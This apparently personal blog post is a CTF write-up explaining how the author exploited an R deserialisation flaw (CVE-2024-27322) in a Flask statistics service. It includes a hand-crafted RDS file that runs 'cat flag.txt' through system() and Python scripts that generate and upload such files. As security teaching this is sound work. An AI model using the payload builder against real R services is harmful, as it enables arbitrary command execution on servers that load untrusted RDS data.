Written by Andrew Donnellan
on 2024-10-25, 18:45 [+11:00]

BSides Canberra CTF 2024: ServeR

Last month, I went to BSides Canberra, an offensively-minded information security conference. It is also the most important regular technical conference in Canberra, attracting plenty of people from both infosec and the broader Canberra tech community.

As usual, there was a CTF organised by the Cybears crew. I formed a team with three of my uni and church friends, and we came a respectable 11th (out of a total of 198 teams who scored at least one flag), which I am very happy with.

This post is a writeup of the most interesting challenge I solved, ServeR.

NOTE: This challenge involves R, a language I've never worked with before and have no idea about beyond what is written in this post. Do not trust my explanations to be entirely accurate, only accurate enough to get the flag. Corrections and clarifications welcome!

EDIT (2024-10-26): It turns out that HiddenLayer has released HiddenPromise, a Python package to manipulate RDS files, which is what they used in their example code. For some reason, it seems the only way to find this is to search their GitHub organisation - they didn't link this tool from their blog post or anywhere else as far as I can tell. Thanks to Ashley in the Cybears Discord server for pointing this out to me!

The challenge

"I created a new service using R to calculate some statistics. Just give it some serialised R data to work on. R must be safe from bugs right? It was created for science!"

You are given the URL of a web server providing an R statistics service, where you can upload what I assume from the question must be serialised R data, and it will give you some summary statistics (mean, standard deviation and median).

It's pretty obvious that we're going to be looking for a serialisation bug: serialisation and deserialisation are notorious sources of very interesting bugs.

Helpfully, we've also been given the code to the site, in a tarball that we can download. There's a Dockerfile:

FROM r-base:4.3.3

RUN apt update && apt install -y python3 python3-flask

WORKDIR /serve_r

COPY flag.txt ./
COPY run_r.py ./
COPY stats.R ./
COPY static ./static/

EXPOSE 8080/tcp
ENTRYPOINT ["python3", "run_r.py"]

The web part is implemented in Python with Flask, accepting the input file via a POST request, writing it to a temporary file, and shelling out to R:

import os
import subprocess
import tempfile
from flask import Flask, request

app = Flask(__name__, static_folder="./static")


@app.route("/", methods=["GET", "POST"])
def index():
    if request.method == "POST":
        f = request.files["file"]
        data = f.stream.read()
        f.close()

        with tempfile.NamedTemporaryFile("w+b", delete_on_close=False) as rds_file:
            rds_file.write(data)
            rds_file.close()

            r_out = subprocess.run(
                ["R", "--vanilla", "-s", "-f", "stats.R", "--args", rds_file.name],
                close_fds=True,
                shell=False,
                stdout=subprocess.PIPE,
            )

        return r_out.stdout.decode("utf-8")

    else:
        return app.send_static_file("index.html")


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080, debug=False)

And the core of the service is a short piece of R code that reads in the file and outputs some HTML with the stats:

fname = commandArgs(TRUE)[1];
data <- readRDS(fname);

cat('<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Stats</title>
</head>
<body>
    <h1>Stats</h1>')
cat(c("<p>Mean: ", as.character(mean(data)), "</p>\n"));
cat(c("<p>Std. Deviation: ", as.character(sd(data)), "</p>\n"));
cat(c("<p>Median: ", as.character(median(data)), "</p>\n"));
cat('</body>
</html>')

I start the Docker container and take a look:

[Screenshot: the index page]

Having never used R before, I install it, then Google around and find out you can serialise data in the RDS format. I fire up R and create a test file with a single number:

> x=5
> saveRDS(x, file="test.rds", ascii=TRUE, compress=FALSE)

Then I upload it, and sure enough, I get some very uninteresting statistics:

[Screenshot: results of a test file containing a single number]

The goal, as always with a CTF, is to get the hidden flag. The handout tarball has a file called flag.txt... but how do we get it?

What's a deserialisation vulnerability?

Serialisation is the process of taking an object and turning it into a sequence of bytes in some structured format that can be saved to disk or transmitted over a network and later be turned back into an object (or deserialised). Examples of serialisation include saving a document in a word processor, adding data to a database stored on disk, or converting a dictionary/hashmap into a format like JSON or XML. OWASP's Deserialization Cheat Sheet is a good summary of different kinds of common deserialisation issues.

A particularly interesting type of serialisation is the object serialisation provided natively by many object-oriented programming languages, such as Java or Python. These native serialisation features allow the serialisation of most kinds of objects that can be represented in the language - not just integers, floats, strings, lists and dictionaries, but arbitrary objects and even things like references to functions. This flexibility can be incredibly useful, but also means that deserialising untrusted, user-controlled input can be very dangerous.
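Python's pickle module is a well-known example of this kind of native serialisation. As a minimal and deliberately harmless sketch (the Payload class is hypothetical and has nothing to do with the challenge), an object can tell pickle which callable to run when the data is loaded:

```python
import pickle


class Payload:
    """Hypothetical object that controls what happens when it is unpickled."""

    def __reduce__(self):
        # pickle stores "call sorted([3, 1, 2])" rather than the object's state.
        # An attacker would name something far less friendly than sorted() here.
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Payload())

# The callable named in the byte stream runs as part of loading,
# and its return value is what the caller gets back.
loaded = pickle.loads(blob)
print(loaded)
```

The caller asked for an object back and got the result of a function call chosen by whoever produced the bytes, which is the general shape of the bug we're about to look for in R.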

The RDS format is R's version of this, and as we can see from the code, the challenge server will happily deserialise any RDS file we give it. Let's see how we can exploit this.

Finding a vulnerability

Using a sophisticated hacker dark web research tool called Google, we search for "R deserialisation vulnerability".

Clicking the top result gives us an excellent blog post on CVE-2024-27322, an issue discovered by researchers at HiddenLayer back in April.

Before we start spending much time figuring out how to exploit this bug, we skim through the post to find that it has been patched in R 4.4.0. Conveniently for us, the supplied Dockerfile says...

FROM r-base:4.3.3

In a CTF challenge, seeing that the target runs the last version of the software released before a vulnerability was patched is a strong indicator that you might have found the vulnerability you need. Let's read a bit more.

CVE-2024-27322

The HiddenLayer researchers discovered that it's possible to create a malicious RDS file that, when loaded, will give you an object that executes arbitrary code as soon as it is first referenced.

The trick here involves promises, a special type of R object used for lazy evaluation. An R promise is an object that stores an expression that isn't evaluated until the promise is accessed at a later point. That expression can be any kind of expression - including a function call.
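For readers who, like me, don't know R, here is a rough Python analogy of the idea. This is only a sketch: the Promise class and its force() method are made up for illustration, and in R the evaluation happens implicitly when the object is accessed rather than through an explicit method call.

```python
class Promise:
    """Rough Python analogy of an R promise: an expression run on first use."""

    _UNSET = object()  # marker meaning "no value computed yet"

    def __init__(self, thunk):
        self._thunk = thunk            # the unevaluated "expression"
        self._value = Promise._UNSET   # filled in the first time we force it

    def force(self):
        # Evaluate at most once, then reuse the cached value.
        if self._value is Promise._UNSET:
            self._value = self._thunk()
        return self._value


calls = []
p = Promise(lambda: calls.append("evaluated") or 42)

before = list(calls)   # creating the promise has not run anything yet
first = p.force()      # the expression runs here
second = p.force()     # cached, the expression does not run again
print(before, first, second, calls)
```

The important part for what follows is that the expression can have side effects, and they happen at the point of first access rather than at creation.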

I'm reasonably certain that in R 4.3.3 there's no way to serialise an unevaluated promise using the supplied serialisation functions (e.g. saveRDS()): accessing the promise during serialisation causes it to be evaluated. The R Language Definition says:

Within the R language, promise objects are almost only seen implicitly: actual function arguments are of this type. There is also a delayedAssign function that will make a promise out of an expression. There is generally no way in R code to check whether an object is a promise or not, nor is there a way to use R code to determine the environment of a promise.

There's not really any legitimate reason why you would want to serialise a promise, and you're not supposed to be able to do it.

However, this doesn't mean that the RDS format can't represent a promise: the researchers realised that you can manually construct an unevaluated promise object in an RDS file. When the RDS file is loaded, the readRDS() function will return this promise, and the promise will be evaluated as soon as the object is referenced for the first time.

Why does this matter from a security perspective? The expression to be evaluated can be whatever we want - and the example given in HiddenLayer's blog post is an expression that references the system() function, which invokes the shell with whatever shell command we want, and returns the output of the command. Reasonable programmers who are calling readRDS() may well expect that a bad RDS file could give them objects they weren't expecting, but they're probably not thinking about the idea that by merely accessing the returned object, they may be executing arbitrary user-supplied code. As the R Language Definition says, you can't even check if the returned object is a promise or not.

In R 4.4 onwards, this issue is fixed by erroring out if you try to deserialise an RDS file containing a promise.

The example exploit

Helpfully, the researchers at HiddenLayer provided an example of the structure of a malicious RDS file. However, rather than providing an actual RDS file, their example appears to be the input to some kind of tooling they've built to experiment with the RDS format (I haven't seen the term "opcode" used elsewhere in relation to RDS, though if I'm wrong please let me know in the comments!):

EDIT (2024-10-26): The tooling in question is HiddenPromise, which I simply didn't find at the time!

Opcode(TYPES.PROMSXP, 0, False, False, False,None,False),
Opcode(TYPES.UNBOUNDVALUE_SXP, 0, False, False, False,None,False),
Opcode(TYPES.LANGSXP, 0, False, False, False,None,False),
Opcode(TYPES.SYMSXP, 0, False, False, False,None,False),
Opcode(TYPES.CHARSXP, 64, False, False, False,"system",False),
Opcode(TYPES.LISTSXP, 0, False, False, False,None,False),
Opcode(TYPES.STRSXP, 0, False, False, False,1,False),
Opcode(TYPES.CHARSXP, 64, False, False, False,'echo "pwned by HiddenLayer"',False),
Opcode(TYPES.NILVALUE_SXP, 0, False, False, False,None,False),

Even without understanding much about R or RDS, we can start to see what's going on here: a "PROMSXP" sounds an awful lot like a "promise", and we can see the CHARSXPs representing the name of the system() function and the argument being passed to it.

Our goal is to create our own version of this, as an RDS file, that gets us the flag. To turn this into RDS, we're going to need to figure out how this corresponds to the format.

The RDS format

The most useful introduction to the RDS format that I managed to find is a blog post by Danielle Navarro. I won't repeat everything she explains here, so go read that post for more.

In addition to Danielle's blog post, I also played around a bit with using saveRDS() to generate my own RDS files, and looking at them in an editor to see what changed as I changed the data I was serialising. I also had to look a bit at the R Internals Manual and the R source code.

The most important things to note:

Conveniently, RDS comes in both binary and ASCII variants - the binary variant gives you smaller files, while the ASCII variant is much easier for us to play with using nothing more than a standard text editor. You can also enable or disable gzip compression - disabling compression is easier for us to play with.
In the ASCII format, data is delimited using newlines.
There is a header consisting of 6 elements - ASCII vs binary mode, the format version, the R version used to write the file, the minimum R version needed to read the file, the number of characters in the string that describes the text encoding, and a string describing the text encoding (e.g. 'UTF-8').
After the header, we get the serialised object. An R object is internally represented as a SEXP (a name inspired by the Lisp S-expression) pointing to a SEXPREC node. A SEXPREC has a SEXPTYPE, which tells us the type of object we're dealing with, and then some attributes and fields if applicable. In ASCII-mode RDS, this is represented using one line containing an integer that combines both the SEXPTYPE and flags, and then separate lines for each field. If a field is a pointer to another node, the child node is recursively written out into the RDS file at that point.

So what does my (ASCII mode, uncompressed) test.rds file, containing the single number 5, look like?

The first six lines of this are the header:

A               # ASCII mode
3               # format version 3
263169          # written with R version 4.4.1 (the version I happened to have on my laptop outside the CTF challenge container)
197888          # minimum R version that can read this is 3.5
5               # 5 characters in next line
UTF-8           # text encoding
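The two version numbers are easier to read once unpacked: they pack major, minor and patch into a single integer (major * 65536 + minor * 256 + patch). Here is a small sketch of a header reader in Python. The function names are my own, and it only handles the ASCII variant described above.

```python
def decode_r_version(packed: int) -> str:
    """Unpack an integer such as 263169 into 'major.minor.patch'."""
    major = packed >> 16
    minor = (packed >> 8) & 0xFF
    patch = packed & 0xFF
    return f"{major}.{minor}.{patch}"


def parse_ascii_header(text: str) -> dict:
    """Read the six header lines of an ASCII-mode RDS file."""
    lines = [line.strip() for line in text.splitlines()]
    if len(lines) < 6 or lines[0] != "A":
        raise ValueError("not an ASCII-mode RDS header")
    encoding = lines[5]
    if len(encoding) != int(lines[4]):
        raise ValueError("encoding length does not match the encoding string")
    return {
        "format_version": int(lines[1]),
        "written_with": decode_r_version(int(lines[2])),
        "min_reader": decode_r_version(int(lines[3])),
        "encoding": encoding,
    }


header = parse_ascii_header("A\n3\n263169\n197888\n5\nUTF-8\n")
print(header)
```

For the header above this reports 4.4.1 as the writing version and 3.5.0 as the minimum reader version, matching the annotations.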

Then we get to the actual content.

14
1
5

If we look up the first line of the content, 14, in the SEXPTYPEs section of the R Internals Manual, we find that it is a REALSXP, or "numeric vector". A REALSXP consists of "length, truelength followed by a block of C doubles". It seems to me that the following line, 1, is the length, and perhaps the "truelength" is some internal field that doesn't exist in the RDS serialised version of a REALSXP, but I'm not sure. We then have a single line containing the actual value, 5.
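To make the "integer that combines both the SEXPTYPE and flags" a bit more concrete, here is a sketch of how I understand the packing from serialize.c: the low 8 bits are the SEXPTYPE, the next few bits are flags, and a "levels" field sits above bit 12. Treat the bit layout as my reading of the source rather than gospel. The function names are hypothetical, and the reader only copes with plain numbers like our 5, not special values such as NA.

```python
REALSXP = 14


def unpack_flags(flags: int) -> dict:
    """Split a serialised flags integer into its parts (my reading of serialize.c)."""
    return {
        "type": flags & 0xFF,
        "is_object": bool(flags & (1 << 8)),
        "has_attr": bool(flags & (1 << 9)),
        "has_tag": bool(flags & (1 << 10)),
        "levels": flags >> 12,
    }


def read_real_vector(lines: list) -> list:
    """Parse the ASCII lines of a REALSXP: flags, length, then one value per line."""
    info = unpack_flags(int(lines[0]))
    if info["type"] != REALSXP:
        raise ValueError("not a REALSXP")
    length = int(lines[1])
    return [float(value) for value in lines[2:2 + length]]


values = read_real_vector(["14", "1", "5"])
print(values)

# Assumption: the 64 in HiddenLayer's CHARSXP opcodes is this "levels" field.
packed_charsxp = 9 | (64 << 12)
print(packed_charsxp, unpack_flags(packed_charsxp))
```

With no flags or levels set, the integer is simply the SEXPTYPE number, which is why our test file starts its content with a bare 14.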

Crafting our own exploit

We want to convert HiddenLayer's example to an actual RDS file, and change the system() argument to cat flag.txt in order to retrieve the flag.

We start with the standard six lines of the RDS header, per the previous section, copy-pasted from an authentic RDS file. That bit's easy. Now the hard part: figuring out how to encode the SEXPs that make up the promise object. This took quite a bit of trial and error and experimentation.

To figure out how the sequence of "opcodes" in the example fit together into something resembling a syntax tree, I had to stare at the R Internals Manual some more to see what each type of SEXP contains. The types of SEXP we need for the example are:

PROMSXP - represents a promise
UNBOUNDVALUE_SXP - this doesn't appear in the R Internals Manual list of SEXPTYPEs, so I had to look at serialize.c in the R source - the source explains that it's an "administrative" value used to represent special objects or control information rather than an actual SEXP
LANGSXP - special type of LISTSXP (see below) used only for function calls. The CAR and CDR point to the function name and a list of function arguments respectively.
SYMSXP - represents a symbol
CHARSXP - represents a single character string (length field followed by the string)
LISTSXP - represents a list. In the Lisp tradition, it's a pointer to the head of the list (CAR) and then another pointer (CDR) to another LISTSXP containing the rest of the list, or NULL if it's the end of the list.
STRSXP - represents a character vector (length field containing the number of strings, followed by pointers to CHARSXPs)
NILVALUE_SXP - like UNBOUNDVALUE_SXP, this is also an administrative SEXPTYPE to represent NULL

With the knowledge from the R Internals Manual, we can arrange the list of opcodes from the HiddenLayer example into a tree corresponding to the SEXPs.

Below is a slightly cleaned up version of the notes I wrote for myself at the time. The question marks represent fields that I didn't end up explicitly representing in the RDS - I imagine they must only be used in the internal representation and thus don't need to be serialised, but don't trust my explanation of this.

PROMSXP
- value:
    UNBOUNDVALUE_SXP
- expression:
    LANGSXP
    - car:
       SYMSXP
         - printname:
           CHARSXP
             - length: 6
             "system"
         [- symvalue??]
         [- internal??]
    - cdr:
       LISTSXP
       - car:
         STRSXP
           - length: 1
           [- truelength??]
           CHARSXP
             - length: 12
             [- truelength??]
             "cat flag.txt"
       - cdr:
         NILVALUE_SXP

Now that we more or less understand how the various SEXPs fit together in a tree, we have to convert the SEXPTYPEs into the numerical values found in the R Internals Manual and the source code, and put all the fields and values in the right spots.

This took a fair bit of trial and error, and using saveRDS() on various types of objects so I could see what a normal RDS file looks like. I didn't write any scripts to do anything fancy - I edited the RDS directly in a text editor, then used readRDS() to see what happened, and iterated until I had something that worked. I also didn't spend too much time trying to actually understand how the serialisation code works - I only looked there when I was out of other options to understand what was going on.

Eventually, I came up with this:

5               # SEXPTYPE = PROMSXP
252             # SEXPTYPE = UNBOUNDVALUE_SXP
6               # SEXPTYPE = LANGSXP
1               # SEXPTYPE = SYMSXP
9               # SEXPTYPE = CHARSXP
6               # length = 6 characters
system          # function name
2               # SEXPTYPE = LISTSXP
16              # SEXPTYPE = STRSXP
1               # length = 1 string
9               # SEXPTYPE = CHARSXP
12              # length = 12 characters
cat flag.txt    # argument to system()
254             # SEXPTYPE = NILVALUE_SXP

Our final exploit

Putting all this together, we have our final exploit:

A
3
263169
197888
5
UTF-8
5
252
6
1
9
6
system
2
16
1
9
12
cat flag.txt
254
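I built this by hand in a text editor, but the same file could be produced by a few lines of Python. The sketch below is not what I used during the CTF and is not the official solution. The function names are my own, the header is just the one copied from my test file, and it does no escaping, so it assumes a command made of plain printable characters like the one above.

```python
# SEXPTYPE numbers from the R Internals Manual and serialize.c
PROMSXP, LANGSXP, SYMSXP, CHARSXP, LISTSXP, STRSXP = 5, 6, 1, 9, 2, 16
UNBOUNDVALUE_SXP, NILVALUE_SXP = 252, 254

# Header copied from a genuine ASCII-mode RDS file
HEADER = ["A", "3", "263169", "197888", "5", "UTF-8"]


def charsxp(text: str) -> list:
    """CHARSXP: type, length in bytes, then the string itself."""
    return [str(CHARSXP), str(len(text.encode("utf-8"))), text]


def build_payload(command: str, function: str = "system") -> str:
    """Return ASCII RDS text for an unevaluated promise of function(command)."""
    lines = list(HEADER)
    lines += [str(PROMSXP), str(UNBOUNDVALUE_SXP)]            # promise, no value yet
    lines += [str(LANGSXP), str(SYMSXP)] + charsxp(function)  # call: function symbol
    lines += [str(LISTSXP), str(STRSXP), "1"] + charsxp(command)  # one string argument
    lines += [str(NILVALUE_SXP)]                              # end of argument list
    return "\n".join(lines) + "\n"


payload = build_payload("cat flag.txt")
print(payload, end="")
```

Computing the string lengths automatically removes the most fiddly part of editing the file by hand when trying different commands.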

We save this as pwned.rds, upload it to the server, and...

[Screenshot: the statistical calculator displaying the flag]
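I uploaded the file through the web form, but the upload could just as easily be scripted. Here is a minimal sketch using only the Python standard library. The "file" field name comes from the Flask handler and port 8080 from the Dockerfile, while the localhost URL, the helper names and the hard-coded pwned.rds filename are assumptions for illustration.

```python
import urllib.request
import uuid


def build_multipart(field: str, filename: str, data: bytes):
    """Build a single-file multipart/form-data body and its Content-Type header."""
    boundary = uuid.uuid4().hex
    body = b"".join([
        f"--{boundary}\r\n".encode(),
        f'Content-Disposition: form-data; name="{field}"; '
        f'filename="{filename}"\r\n'.encode(),
        b"Content-Type: application/octet-stream\r\n\r\n",
        data,
        f"\r\n--{boundary}--\r\n".encode(),
    ])
    return body, f"multipart/form-data; boundary={boundary}"


def upload(url: str, path: str) -> str:
    """POST the file at `path` to the stats service and return the HTML response."""
    with open(path, "rb") as handle:
        body, content_type = build_multipart("file", "pwned.rds", handle.read())
    request = urllib.request.Request(
        url, data=body, headers={"Content-Type": content_type}, method="POST"
    )
    with urllib.request.urlopen(request) as response:
        return response.read().decode("utf-8")


# Example against a local copy of the challenge container (assumed URL):
# print(upload("http://localhost:8080/", "pwned.rds"))
```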

This flag scored us 498 out of our total of 5,106 points!

It was 12:13am, and I still did over an hour more work on flags before going to bed so I could get there in time for the 9am keynote on the final day...

Now that the CTF is over, we can see the official solution, which involves a Python script that lets you express each relevant type of SEXP as a Python object and then serialise them. Far fancier than my handcrafted approach.

Acknowledgements

Thanks to the Cybears team for running a great CTF, the rest of the BSides Canberra team for running the rest of the conference, the authors of the various blog posts and manuals I read, and my three teammates for their contribution to our 11th place finish!

The Cybears have generously released the source code to this year's CTF challenges, including solutions.
